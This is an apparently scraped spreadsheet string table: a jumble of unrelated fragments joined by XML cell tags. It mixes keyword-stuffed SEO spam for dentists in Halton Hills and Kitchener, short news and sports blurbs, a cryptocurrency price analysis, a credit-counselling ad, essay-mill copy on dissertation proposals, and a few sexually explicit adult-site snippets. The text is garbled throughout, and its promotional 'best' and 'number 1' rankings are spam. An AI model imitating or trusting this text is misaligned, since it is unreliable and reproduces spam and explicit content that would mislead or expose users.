Dental Clinic Near Halton Hills. John Kuo MD+PhD. Top IVF Fertility Specialist. Infertility+Ob/Gyn Board Certified. National&amp;Regional Awards. Best General Dentistry in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, King’s Cove Family Dental, Trenton A W Denturist, Diana Dental, Pownall Janet, DDs – Still Waters Dental, Lefebvre Ronald, Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, King's Cove Family Dental, Market Place Dental Centre, Young Dentistry, Oksana M. Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated investor schemes. Best Dental Clinic Near Halton Hills Ontario 为您提供与 Dartmouth 相关的域名和网站信息，帮助您从域名应用的角度更好的了解域名是如何被使用的，为您使用域名提供参考依据。 We deliver News Weather and Sports for Halton Hills daily and we invite other. Best Cosmetic Dentists in Halton Hills, ON – Downtown Georgetown Dental, Sunnyview Dental – Georgetown, Apple Dental, Market Place Dental Centre, Pownall Janet, DDs – Still Waters Dental, King's Cove Family Dental, Still Waters Dental Group,</t>
  </si>
  <si>
    <t>Low interest rates have a flip side for those chasing good yield</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/snap-spectacles-3-glasses Snap Bets Its Future on a Stylish New Pair of Spectacles The camera-enabled sunglasses get a face-lift, a second camera, and a few new viewing powers. It’s all part of Snap’s plan to dominate augmented reality. Source: https://www.wired.com/story/snap-spectacles-3-glasses The post Snap Bets Its Future on a Stylish New Pair of Spectacles appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Customers are still struggling to get in touch with BA, as it works through a backlog of 40,000 calls. Read more? Click here</t>
  </si>
  <si>
    <t>Cosmetic Dental Clinic Near Halton Hills Ontario A state-of-the-art Dental practice poised to serve the developing communities of Georgetown and the Halton Hills region. Our focus is patient-centered care, whereby the patient-Dentist relationship is rooted in communication, patient education. Cosmetic Dentist Near Halton Hills Ontario Best Dental Clinic Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Ontario Dentistry on Best Dental Clinic Near Halton Hills Best Cosmetic Dentists in Halton Hills, ON – Downtown Georgetown Dental, Sunnyview Dental – Georgetown, Market Place Dental Centre, Apple Dental, Pownall Janet, DDs – Still Waters Dental, King’s Cove Family Dental, Still Waters Dental Group, Kid Friendly Dentist Near Halton Hills Ontario Best Dentist in Halton Hills. RSS; Friendliest Dentist In Halton Hills. Number Locate and compare Dentists in Halton Hills ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. TC Energy reports strong second quarter financial results – Comparable earnings for second quarter 2019 were $924 million or $1.00 per common share. (previously Energy): Ontario Natural Gas-Fired Power Plants: On July 30, 2019, we entered into an agreement. OPG signs acquisition agreements in Ontario. 683 MW Halton Hills GS, and the remaining 50 per cent interest in the 550 MW Portlands Energy Centre. The acquisition is subject to a number of. Between 2006 and 2016 the number. 1 per cent. And Milton, as mentioned saw an increase in empty homes while Oakville. KARAS DENTAL CLINIC dentist Halton Hills phone +1 905-702-9700 • KARAS DENTAL CLINIC dentist Halton Hills L7G 4B1 • KARAS DENTAL CLINIC dentist Halton Hills 308 Guelph Street. Highest Rated Dentist In Halton Hills Best Dental Clinic Near Halton Hills Best Cosmetic Dentists in Halton Hills, ON – Downtown Georgetown Dental, Sunnyview Dental – Georgetown, Market Place Dental Centre, Apple Dental, Pownall Janet, DDs – Still Waters Dental, King’s Cove Family Dental, Still Waters Dental Group, Kid Friendly Dentist Near Halton Hills Ontario Best Dentist in Halton Hills. RSS; Find the best Dentist in Halton Hills, Ontario. Discover Dentists reviews and contact details, including opening hours and phone numbers. Add a company Share Share Tweet Dentists in Halton Hills, ON – Ratings &amp; Customer Reviews Canada Dentis. Kid Friendly Dentist Near Halton Hills Ontario Best Dentist in Halton Hills. RSS; Friendliest Dentist In Halton Hills. Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider. Number 1 Dentist In Halton Hills Ontario SALFORD PHOTO ARCHIVE GIVEAWAY . Star date: 15th April 2012. OLD BROUGHTON AND CENTRAL SALFORD PHOTOS. Paul Dyson’s late step-dad, Stan Horrocks, took hundreds of photos of Higher and Lower.</t>
  </si>
  <si>
    <t>Do you get nervous in elevators? A bit suspicious of self-driving cars and similar technology? Linwood Barcaly gets you. His latest novel, Elevator Pitch, features someone sabotaging lifts across New York, with terrifying results; and his next features murderous motor vehicles. Given that Stephen King is a major fan, US-born Barclay must be doing something very right in the thriller world. Today he shares his secrets with the Sunday Book Club.</t>
  </si>
  <si>
    <t>The violence interrupted nearly two weeks of calm in Hong Kong, which has been gripped by a turbulent pro-democracy movement since June.</t>
  </si>
  <si>
    <t>Gregg Chadwick</t>
  </si>
  <si>
    <t>Surf &amp; Turf Artist Talk and Tour at Castelli Art Space August 10, 2019 Please join us at Castelli Art Space on Saturday, August 10th, 3-6pm for the Surf &amp; Turf Artist Talk &amp; Tour - LA as Muse: How the city and it's diverse neighborhoods and cultures influence art today Open 3-6, Curator and Artist Talk and Walkabout, 3:30-4:30 (In Conjunction with the Culver City Art Walk) Featuring New Paintings About Los Angeles by Gregg Chadwick, Brooke Harker, Gay Summer Rick, Teale Hatheway, Alex Schaefer, and John Kilduff Castelli Art Space 5428 West Washington Blvd, Los Angeles CA, 90016 Please RSVP here for your free tickets. About Gregg Chadwick's L.A. Inspired Art “Tonight the riders on Sunset are smothered in the Santa Ana winds And the western stars are shining bright again” - Bruce Springsteen, Western Stars My new paintings in Surf &amp; Turf at Castelli Art Space are crafted as magic lenses that combine the past, present, and future of Los Angeles. The clear daylight of Los Angeles brought the movie studios out west. And the neon soaked nocturnal light lured writers into the shadows of L.A. As a 17 year old art student at UCLA, I embraced the flickering cinematic light of Hollywood and the poetic light of night and day in the City of Angels. I am continuously inspired by the diversity, history, and beauty of greater Los Angeles. Gregg Chadwick Los Angeles Inspired Artwork at Castelli Art Space Castelli Art Space 5428 West Washington Blvd, Los Angeles CA, 90016 Gallery hours are Tuesday - Friday 10-5 https://www.greggchadwick.com/Gregg_Chadwick/index.html “Surf &amp; Turf “ Saturday August 10th, 3-6 pm Artists Walk &amp; Talk: LA as Muse: How the city and it's diverse neighborhoods and cultures influence art today Closing Reception - Saturday, August 17th, 5-8 pm More on Gregg Chadwick's Artwork.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Pasadena, Texas Consumer Credit Counseling Service | (888) 551-1270 Monday 05 August 2019 12:51 AM UTC-05 | Tags: pasadena-texas-consumer-credit-counseling-service-888-551-1270 https://youtu.be/qxQlFDsV0Mc Pasadena, Texas Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Wage Garnishment and Vehicle Repossession solutions, Mortgage Loan Modification, and Debt Settlement through chapter 13. Pasadena, Texas Credit counseling (888) 551-1270 starts with the parent and may include intermediaries later in life empowered by the individual debtor to act on their behalf to negotiate with creditors and resolve debt that is beyond a debtor's ability to pay. Credit counseling is a generic name and is not a brand name owned or controlled by any agency or company. Pasadena, Texas Consumer credit counseling services (888) 551-1270 are provided by attorneys, accountants, finance and tax professionals, for-profit, and non-profit credit counseling companies. Regulations on credit counseling and credit counseling agencies varies by country and sometimes within regions of the countries themselves. In Pasadena, Texas individuals filing Chapter 13 bankruptcy are required to receive counseling from a designated credit counseling agency. https://www.youtube.com/channel/UCqFSDDQNMeoCiHOGA0-O9xQ/about https://t.co/JqMKB0967s — Texas Consumer Credit Counseling Service (@GeneroSebastian) July 17, 2019 https://twitter.com/GeneroSebastian/status/1151304065046863872 Tags: pasadena-texas-consumer-credit-counseling-service-888-551-1270</t>
  </si>
  <si>
    <t>Lukaku in Milan ahead of probable Inter move Manchester United‘s Belgian forward Romelu Lukaku arrived in Milan early Thursday to undergo medical tests ahead of his likely transfer to Inter, Italian media reported. “Lukaku is ours” chanted Inter Milan ecstatic fans who turned out at the airport to welcome him on his arrival during the night. The 26-year-old has not played a single minute of United’s pre-season campaign as talk of a transfer to the Serie A intensified, with Inter Milan the hot favourites. Italian newspapers have said the fee could be 65 million euros ($73 million), plus bonuses of around 10 to 13 million euros. Sports newspaper Gazzetta Dello Sport said Lukaku travelled to Milan with his agent and friend Federico Pastorello and was to undergo stringent medical tests on Thursday. Inter coach Antonio Conte said on Sunday he was “very hopeful” of finalising a deal to bring the former Everton star to the San Siro. “Lukaku is a good player, a striker who I had tried to buy when I was coach at Chelsea” from 2016 to 2018, Conte said. According to Gazzetta Dello Sport, Manchester United initially refused a deal and frenzied contacts between the two sides have taken place in recent days. The player was in Brussels on Monday and Tuesday training with his boyhood club Anderlecht. Local papers showed pictures of him in the Belgian club’s colours. Inter have been in the market for a centre forward since the start of the transfer window. But the club has been competing for his services with fellow Serie A side Juventus, who Italian media said had offered Manchester United an exchange with Paulo Dybala. This post Lukaku in Milan ahead of probable Inter move appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>ETC Price Analysis – August 27 Ethereum Classic (ETC) increases by 6% in the first half of the day. The price escalation increases hope among the intraday traders. ETC/USD Market Key Levels: Resistance levels: $8.5, $9.0, $9.5 Support levels: $5.5, $5.0, $4.5 ETCUSD – Daily Chart Ethereum Classic (ETC) has repeatedly proven its potential in the market. The coin is often criticized for following Ethereum. Today, Ethereum is facing a loss, but Ethereum Classic has taken a leap forward. A few days ago, we saw the coin dealing with the bears. The market pressure was huge and traders also lost hope. Well, the currency has fought against the pressure and started to position itself in the best range today. In the last seven days, ETC has recorded the highest value moving from $6.0 to $7.2 as at the time of writing. The on-going trend may move a little bit higher this week, and the coin may likely touch the nearest supply at $8.5 before the end of the week, but if the bulls put more effort, it could hit additional supply levels at $9.0 and $9.5 respectively. Moreover, should in case the bulls failed, the token’s price will begin to resume low if the bearish volatility occurs and move down to cross the 21-day MA. The demand levels to watch out for are $5.5, $5.0 and $4.5. Both the stochastic RSI and MACD indicators are on the positive sides. ETC/BTC Market Comparing with Bitcoin, Ethereum Classic has followed a decent rise over the past few days and the price appears to be resuming bearish run at the moment. The next level of support may surface at 550SAT and then locate further key support at 500SAT and 450SAT levels if the sell-off later becomes huge. ETCBTC – Daily Chart While price remains indecisive, the ETC trading is likely to move up to the 800SAT, 850SAT, and 900SAT resistance levels if the bulls stand firm. According to the stochastic RSI, the market is swimming at the overbought area and when coming down, it could trigger some bearish signals on the market soon. But the MACD is still giving some bullish signals. Please note: Cryptovibes.com is not a financial advisor. Do your own research before investing your funds in any financial asset or presented product or event. We are not responsible for your investing results. Azeez M. Mustapha Azeez Mustapha is a technical analyst, has many years of trading experience in the stock exchange and the crypto markets. He has broad experience in Forex trading, coaching, and funds management. e-mail: azeez@fxtimes.com</t>
  </si>
  <si>
    <t>Heather McNab</t>
  </si>
  <si>
    <t>Mascot Towers owners have passed a motion to pay a $7 million levy plus GST to fund remediation work on the complex, at an extraordinary general meeting.</t>
  </si>
  <si>
    <t>Andrew Hooper and Josh Bastyr were kayaking near Spencer Glacier in Alaska when they heard cracking noises. Moments later, the massive glacier collapsed right in front of them. Watch a giant glacier collapse in front of two kayakers The post Watch a giant glacier collapse in front of two kayakers appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Christina Zhou</t>
  </si>
  <si>
    <t>China's Foreign Ministry suggests Australia reflect on how it engages its Pacific neighbours after Fiji's Prime Minister accused Scott Morrison of being "insulting and condescending" at last week's Pacific Islands Forum in Tuvalu.</t>
  </si>
  <si>
    <t>Can we take Sacha Baron Cohen seriously? The new Netflix series The Spy think we can</t>
  </si>
  <si>
    <t>"Kudos to this officer who gives his profession and his team a good name."</t>
  </si>
  <si>
    <t>Graham Porter</t>
  </si>
  <si>
    <t>The groups for the 2019/20 Premier League International Cup have been confirmed. Newcastle United drawn in Group C alongside Hertha Berlin and Benfica. In an official announcement confirming the news,...The groups for the 2019/20 Premier League International Cup have been confirmed. Newcastle United drawn in Group C alongside Hertha Berlin and Benfica. In an official announcement confirming the news,... You can click here to read the full article. The post Newcastle United draw Benfica and Hertha Berlin in Premier League International Cup appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>Belarusian Ukrainian Dictionary – travel dictionary to translate Belarusian to Ukrainian. Click on the list to show Belarusian or Ukrainian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Belarusian Ukrainian Dictionary →</t>
  </si>
  <si>
    <t>Kirill Gerstein’s recital wove together themes of heroism, martyrdom and memorial arising, from moments of social tumult.</t>
  </si>
  <si>
    <t>Children are being lured into sexual exploitation by adults offering them drink and drugs at properties across Dundee, according to one of the region’s top cops.</t>
  </si>
  <si>
    <t>Nick Taylor</t>
  </si>
  <si>
    <t>Western Force demolished the Malaysia-based, South African backed Valke 74-10 in their final Global Rapid Rugby showcase series clash at HBF Park last night.</t>
  </si>
  <si>
    <t>Investors have slaughtered the ASX-listed poultry producer Ingham's, slashing $256 million off its market capitalisation in a day.</t>
  </si>
  <si>
    <t>Slotholders will be able to stay solvent for longer with an extra $100,000 for those with horses which finish in the second half of the field this year.</t>
  </si>
  <si>
    <t>ANGEL HAS FALLEN</t>
  </si>
  <si>
    <t>Plexo Torresoft Alex Torres Software version 2.0 suffers from cross site scripting and remote SQL injection vulnerabilities. Published at: August 26, 2019 at 04:56PM View on Packet Storm The post Plexo Torresoft Alex Torres Software 2.0 Cross Site Scripting / SQL Injection appeared first on Secured Me.</t>
  </si>
  <si>
    <t>My Kinks: sexy lingerie and foot lover. Webcam profile: Young Colombian, wanting adventures and new experiences to please your most intimate fantasies. Favourite sex position: Doggy style, missionary and eagle. What I do in my amateur show: People with good topics for conversation, kisses on the neck and finger games What I don’t like: I don’t like hurting myself, bad smells and badly educated people. Gallery</t>
  </si>
  <si>
    <t>A Perth woman who concealed her pregnancy and gave birth in secret has been sentenced under a charge believed to be a WA first.</t>
  </si>
  <si>
    <t>Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, King's Cove Family Dental, Market Place Dental Centre, Young Dentistry, Oksana M. Local woman named to ‘Top Dentist’ list – She treated many patients while working in the university’s dental clinic, including some with. and she became an. Best Dentists in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, Sunnyview Dental – Georgetown, King's Cove Family Dental, Pownall Janet, DDs – Still Waters Dental, Market Place Dental Centre, A state-of-the-art Dental practice poised to serve the developing communities of Georgetown and the Halton Hills region. Our focus is patient-centered care, whereby the patient-Dentist relationship is rooted in communication, patient education. Most Popular Dental Clinic In Halton Hills Welcome to Marketplace Dental Centre, one of best dental Clinics in Georgetown, Ontario. Dr. Anoop Sayal and Associates have been proudly serving Georgetown and Halton Hills since 1994 and we warmly welcome you to join our family of patients. We. Best Cosmetic Dentists in Halton Hills, ON – Downtown Georgetown Dental, Sunnyview Dental – Georgetown, Locate and compare Dentists in Halton Hills ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usually evoke frightening. Halton Hills Veterinary Clinic – 2 Main St. North, Georgetown, Ontario L7G3G6 – Rated 4.4 based on 6 Reviews "Dr. Tony and his caring team literally. Jump to Sections of this page Accessibility Help Press alt + / to open this menu.</t>
  </si>
  <si>
    <t>Bellgro Inc. is a Canadian based distribution company in the field of health, wellness, beauty, and food. We carefully select and Locevaluate reputable product brands locally and internationally to cater to the specific needs of our clients. If you have a career in sales or looking to start one, this will be an opportunity for .. Read more</t>
  </si>
  <si>
    <t>Travis Lowe</t>
  </si>
  <si>
    <t>The KIJHL will celebrate Grant Sheridan's legacy by having every player place a sticker, with the initials GS, on their helmets.</t>
  </si>
  <si>
    <t>What wines are best to cellar? The answer is as easy as one, two three.</t>
  </si>
  <si>
    <t>/u/ShannonBowers06</t>
  </si>
  <si>
    <t>submitted by /u/ShannonBowers06 [link] [comments] The post Christmas vacation Craigslist threesome with big clit Hotwife – pt2 appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>Osaka, Japan Travel Vlog 2019 (Part 2) The post Osaka, Japan Travel Vlog 2019 (Part 2) appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>The inaugural Narrogin Nightfields has been hailed a success, with more than 90 local children taking part in sporting activities across Narrogin’s sporting complexes</t>
  </si>
  <si>
    <t>Washington Nationals closer Sean Doolittle has had his ups and downs this season but for the most part has been effective for the wild card-leading Nationals. The 32-year-old’s 3.51 ERA is almost two runs higher than his 2018 figure, although the majority of his failures have come against New York. Source: Sports Business News</t>
  </si>
  <si>
    <t>If your client works in the healthcare industry in Canada, they likely know they are an attractive target for cybercriminals. But new research from global cybersecurity company Kaspersky sheds light on some of the reasons why. The study of more… The post Three reasons why healthcare is often the target of cyberattacks appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Charles LeClaire-USA TODAY Sports After a frustrating rookie season in 2018, Steelers receiver James Washington looked like a man among boys in the first preseason game of 2019 on Friday. That is a good sign, and it could mean he’s ready to make that all important first to second year leap. Forgive me for going after some low hanging fruit following the Steelers first preseason game on Friday—a 30-28 victory over the Buccaneers at Heinz Field. I’m sure I’m not the only one who will write a glowing article about James Washington’s four-catch, 84-yard performance that also included an eight-yard touchdown from his old college quarterback, Mason Rudolph, but that doesn’t mean another one isn’t warranted. After all, the extent of Washington’s progress was one of the many questions that needed to be answered as the Steelers reported to training camp on July 26; would he make that all-important first to second year leap, or was his abysmal rookie campaign, one that came close to rivaling the freshman season Limas Sweed turned in a decade earlier (it even included a drop of what should have been an easy touchdown), a sign of things to come? Without getting ahead of myself, I think the Steelers liked the first answer Washington turned in on Friday. He certainly looked like a man among boys as he jumped up and snatched a 43-yard laser from Joshua Dobbs early in the first quarter. In fact, Washington looked like the receiver his draft profiles described him as being in the months before the Steelers selected him in the second round of the 2018 NFL Draft. Washington not only showed off his speed by getting behind the defensive back downfield (he was a deep-threat at Oklahoma State), he high-pointed the football and came down with it even though said defensive back had made up enough ground to contest the play as Washington fell to the ground (his ability to come up with contested catches on deep throws was considered a strength entering the pros). And Washington made a great adjustment when reeling in Rudolph’s back-shoulder throw on the touchdown pass late in the second quarter. Maybe I really am getting ahead of myself with my praise of Washington. I have said more than once now—in the title and in the article—that Washington looked like a man among boys. Maybe that’s because Friday’s match-up was filled with a bunch of young NFL hopefuls who may not even be around in a few weeks. Even still, I think that’s a good sign. The learning curve for rookie NFL receivers is normally pretty high. For every JuJu Smith-Schuster or Louis Lipps (just to go a little old school), there are dozens of receivers who have rookie campaigns on par with Washington and his 2018 stat-line that included just 16 catches for 217 yards. Does this mean Washington is destined to take the number two receiver role from Donte Moncrief? It’s way too early to tell. Besides, Moncrief, who signed with the Steelers in the spring, didn’t even play on Friday, which tells me the coaching staff is comfortable with where the six-year veteran is after just two weeks of training camp. But Washington’s performance on Friday could mean that he’s for real, which I think is much more important than his pecking order on the depth chart. Speaking of way too early, it’s obviously too soon to make any predictions on the rookie season of one Diontae Johnson, a third-round pick out of Toledo. But you haven’t heard a whole lot about Johnson so far in camp, and that’s because he’s been battling injuries. Considering the aforementioned big learning curve for rookie receivers, Johnson might be in for a long and frustrating first year in the pros. But, fear not, young Diontae. With hard work and determination, next year at this time, you might just be where Washington is right now. After Friday night, it appears James Washington is in a very good place.</t>
  </si>
  <si>
    <t>Cruise missiles were removed from the UK in 1991, ending their controversial deployment at Greenham Common in Berkshire, because of the intermediate-range nuclear forces (INF) treaty, which is now expected to lapse on Friday. The US is due to officially withdraw from the 1987 agreement – which eliminated missiles with ranges of 310-3,420 miles (500 to 5,500km) – after Donald Trump last year accused Moscow of violating it – a charge Russia denied. In response, Vladimir Putin suspended Russia’s participation in the treaty last month. Protesters link arms at Greenham Common in 1983. Photograph: Hulton Archive/Getty Images The Greenham Common base was the site of a celebrated women’s protest. Many of those present believe the demonstrations helped create the pressure to disarm that led to the signing of the missile ban treaty between the US and Soviet Union in 1987. Rebecca Johnson, who spent five years at the protest camp from its early days in 1982, believed it took years of “massive anti-nuclear protests in the 1980s” at places such as Greenham to force world leaders to act. Ripping it up, Johnson said, put the world “at heightened risk of nuclear weapons use and war” – although she, still an anti-nuclear protester, hopes countries will sign up to an alternative multilateral 2017 treaty on the prohibition of nuclear weapons instead. “When we started at Greenham, I’m not sure we were particularly thinking in terms of a nuclear treaty, we just wanted to get rid of the missiles,” she said. “It was the treaty that gave me permission to leave and start campaigning on other things.” Police drag away anti-nuclear demonstrators at the Greenham Common in 1982. Photograph: PA Protests at the US airbase began after a group of women marched from Cardiff in autumn 1981 in the hope of debating with the base commander and its personnel the decision to base 96 cruise missiles there. Their plea was ignored and instead the women set up a camp and lived there full-time. The camp stayed until 2000. The US left Greenham in 1992, and the site is now disused, although the original missile silos remain. They were used as a setting for a rebel base during the filming of Star Wars: The Force Awakens. If cruise missiles were ever to be redeployed in the UK, Johnson believes the most likely site would be RAF Lakenheath in Suffolk. Such a redeployment is considered unlikely, although the Campaign for Nuclear Disarmament (CND) will on Friday deliver a letter to Downing Street to ask the prime minister, Boris Johnson, to refuse to host intermediate US nuclear weapons. Source link</t>
  </si>
  <si>
    <t>Benjamin Gubana</t>
  </si>
  <si>
    <t>There was once a plan to market Perth as the home of a range of ambitious attractions. But the WA Government has pivoted to events-based tourism to lure visitors and the numbers show the strategy is succeeding.</t>
  </si>
  <si>
    <t>The Basics of Writing a Dissertation Proposal If you want to complete your dissertation, learn how to read. To begin with, you must understand how to structure your dissertation. Thus, when you buy a dissertation, you have a month of free revisions. Your final dissertation has become the most important portion of your Master’s program. https://marianopaz.com When you start your dissertation proposal, https://marianopaz.com you’ll begin setting up the goals of the dissertation, and you’ll think over the ways of collecting and presenting the data. Despite the fact that you won’t write much in the dissertation proposal, you’re still to keep the formal style. If you would like your dissertation proposal convincing, you will need to receive the format right and it has to be clean and simple to follow. Ensuring your dissertation proposal in social work is of a top quality isn’t that hard once you have whenever you have taken the proper preparations steps. Writing a Dissertation Proposal Explained Jump to the HOW You have stated the WHAT portion of the dissertation now you have to state how you’re likely to execute the research that is known as the Methodology. A dissertation is definitely an intricate object of research that a student is supposed to submit to acquire an academic level. For all of us, writing premium quality dissertations is an avocation! It is possible to produce your dissertation with the help of our experienced tutors. Since you’re going to work early on your dissertation, it’s good to find advice from your seniors about their experiences, you are able to also refer to dissertation examples on the internet for clear comprehension. As the dissertation represents your learning in addition to your skills at the close of the calendar year, you have to do it carefully for maximum benefits. Thus, the entire dissertation provided is genuine and free from any type of plagiarism. Exactly like a strongly developed building needs a strong base, an excellent dissertation demands a very good proposal, otherwise things are certain to come crashing down sooner or later. Ideas, Formulas and Shortcuts for Writing a Dissertation Proposal The proposal comprises the Following chapters. The dissertation proposal ought to have a particular field of research that ought to neither be too exhaustive nor too narrow and at the very same time ought to be interesting for the researcher together with the reader. The proposal for a dissertation provides a background to the true dissertation so that it should cover all the essential facets which will be displayed in the finished dissertation. Furthermore, a dissertation proposal is going to be the principal method of communication with your supervisor. Of course, it is a challenging task. Writing a dissertation proposal is step one for virtually any researcher or student who needs to finish a dissertation. The key to writing a strong dissertation proposal is to receive a great grasp about it. Even in the event the proposal isn’t mandatory in your university, you still ought to write it and. A well-crafted proposal is likely to make your thesis a part of cake. Even though the proposal describes your upcoming work and highlights each of the critical details, it still have to be concise. Don’t forget that Introduction gives clear focus to your research and can help you shape’ both the proposal and the last dissertation. Overall, dissertation proposal is crucial for your writing, because it’s an initial stage of your dissertation. A dissertation proposal will surely be approved in the event the student has done extensive reading on all available material on the subject. The secret to writing a strong dissertation proposal is to get a great grasp on the subject.</t>
  </si>
  <si>
    <t>The west suburb of DuPage County, which was once named one of the top places to raise children across the nation, is known. Friendliest Dental Clinic Near Kitchener Innaloo Dental Clinic Announces Sunday Opening Hours to Better Serve the North-West Perth Suburbs – Local dentist office near Innaloo is now open for business on Sunday to allow more patients to visit their clinic. This. Ongoing breastfeeding support and nutritional information is available at our WIC Clinic, Ron Wood Family. Contest. They come from a goat farm near Atoka, which is where they retire at some point. time than to pad about the museum grounds. Meet at Lost Creek Reserve, barn with shelter/overhang near the parking lot. TRAVELING SMILES: Traveling Smiles of the Miami County Dental Clinic will present Fresh Breath Day at Oakes-Beitman. Falls public health site to open this fall – At a groundbreaking ceremony last July, officials said the new site will provide the in-house services currently offered at. Highest Rated Dental Clinic Near Kitchener Ontario Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Dentists Near Me Ramirez Family Dentistry 509 Wilson Ave ##14, Kitchener Fairway Dental Urgent Care Clinic – Kitchener 385 Fairway Rd S #203, Kitchener Solar Dental Kitchener – Fairway 655 Fairway Rd S Toothworks Fairview Park 2960 Kingsway Dr. Kid Friendly Dental Clinic In Kitchener Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric clinic is equipped with child-friendly technology and dentistry tools. Our clinic is highly interactive, designed to give children a. Looking for a dentist in Waterloo? Waterloo Smiles – best dental care clinic serving family, Cosmetic and Pediatric Dentistry in Waterloo-Kitchener, ON. Book an Appointment; call. Two of the most amazing offers that any dental clinic can give to. commitment not only to their family but to the entire. We offer friendly, expert dental care to families in Kitchener-Waterloo. From baby’s first tooth to the more complex needs of seniors, you can trust us to keep you smiling! India- Fall Creek Dentistry Offers Healthy Smiles At The Most Affordable Prices At Fishers, IN – that is not available in other dental clinics. Fall Creek Dentistry is dedicated to providing excellent service and. Kid Friendly Dental Clinic Near Kitchener 2019-05-01 · Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his YouTube channel. The gamble paid off – James Hobson just bought a house in Kitchener, near the Waterloo border. Then, he quit his job. “I was about six months from. Tesla has just updated its long-range Model S sedan and Model X SUV with even. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. Ongoing breastfeeding support and nutritional information is available at our WIC Clinic, Ron Wood Family. Coloring. Kid Friendly Dental Clinic In Kitchener Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. The prized residential setting means that many locals also value having access to the best dental services that can be obtained for their family. In her review, Tricia G. of Carlsbad stated that they. Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric clinic is equipped with child-friendly technology and dentistry tools. Our clinic is highly interactive, designed to give children a. Family Dentistry In Cedar Rapids, IA And Children – Another way to get children to like visiting dentists is to give children special treats after visiting dental clinics. A. We offer friendly, expert dental care to families in Kitchener-Waterloo. From baby’s first tooth to the more complex needs of seniors, you can trust us to keep you smiling! Fall Creek Dentistry Offers Healthy Smiles At The Most Affordable Prices At Fishers, IN – Two of the most amazing offers that any dental clinic can give to. commitment not only to their family but to the entire. Most Popular Dental Clinic In Kitchener Ontario Number 1 Dental Clinic In Kitchener Major Players Operating in the Dental Braces Market from 2019 to 2023 | Technavio – Thus, the growing number of dentists is expected to increase the number of dental clinics, which, in turn. Top five dental. Highland Dental Clinic (1.8 km) 200 Highland Rd W Kitchener, ON, N2M 3C2 519-570-1001 Kitchener Dentists Dental Office (1.8 km) 6-200 Highland Rd W Kitchener, ON, N2M 3C2. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you. Highest Rated Dental Clinic Near Kitchener Ontario Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Kid Friendly Dental Clinic In Kitchener Ontario Most Popular Dental Clinic In Kitchener Most Popular Dentist Near Kitchener Kitchener seniors concerned about change to bus route – KITCHENER — Seniors living in two apartment. buildings to the stores clustered together on Weber near Franklin Street, KITCHENER. Most of their life-cycle finishes in July. But this year, it’s a few weeks behind. "June is peak," Shea said. to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most embarrassment and we made out a plan to fix them, by. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Preferred Dentist In Kitchener Brides Wanted – job or abroad preferred. Two sisters married &amp; in USA &amp; Italy. E-mail: msk2617@gmail.com CL19053155 Wanted suitable vegetarian Dentist / Medico match for Sarswat Brahmin boy 03.08.1992,10:12PM, Kid Friendly Dentist Near Kitchener Ontario Oshawa produces some of Canada’s top musicians — but it’s running out of venues for them to play – So I think the suburbs would be a big part of why there are successful musicians coming out of these areas because they’re kids who got bored and put all. on Simcoe St. The Velvet Elvis is now a. Home Ontario Elora 